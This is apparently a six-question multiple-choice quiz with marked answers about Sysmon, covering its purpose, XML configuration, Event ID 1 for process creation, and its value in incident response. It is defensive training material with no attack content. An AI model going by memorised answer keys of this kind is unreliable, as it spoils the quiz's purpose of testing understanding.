[&] What is Sysmon primarily used for?
- To replace the standard Windows Event Logging
- To patch vulnerabilities across multiple Windows endpoints
- To enhance detection and analysis of system events -- Correct
- To manage user account permissions in Active Directory

[&] Which of the following has a significant impact on Sysmon's functionality and efficiency?
- The operating system version
- The size of the hard drive
- The number of user accounts on the system
- The XML configuration file used -- Correct

[&] How does Sysmon help incident responders during an investigation?
- By scanning endpoints for known vulnerabilities and patching them
- By automatically tagging malicious activity 
- By providing detailed logs of process creations, network connections, and file changes -- Correct
- By automatically blocking malicious network connections in real-time

[&] Why is Sysmon considered lightweight?
- It only runs when manually activated
- It has a low resource footprint and customizable settings -- Correct
- It eliminates the need for external monitoring tools
- It requires zero configuration to deploy

[&] Which Sysmon event ID is used to track process creation?
- Event ID 11
- Event ID 3
- Event ID 1 -- Correct
- Event ID 13

[&] What advantage does Sysmon provide over standard Windows event logs?
- It offers enhanced visibility and detailed logging for security analysis -- Correct
- It provides a graphical interface for easier management
- It runs on non-Windows systems seamlessly
- It automatically fixes network issues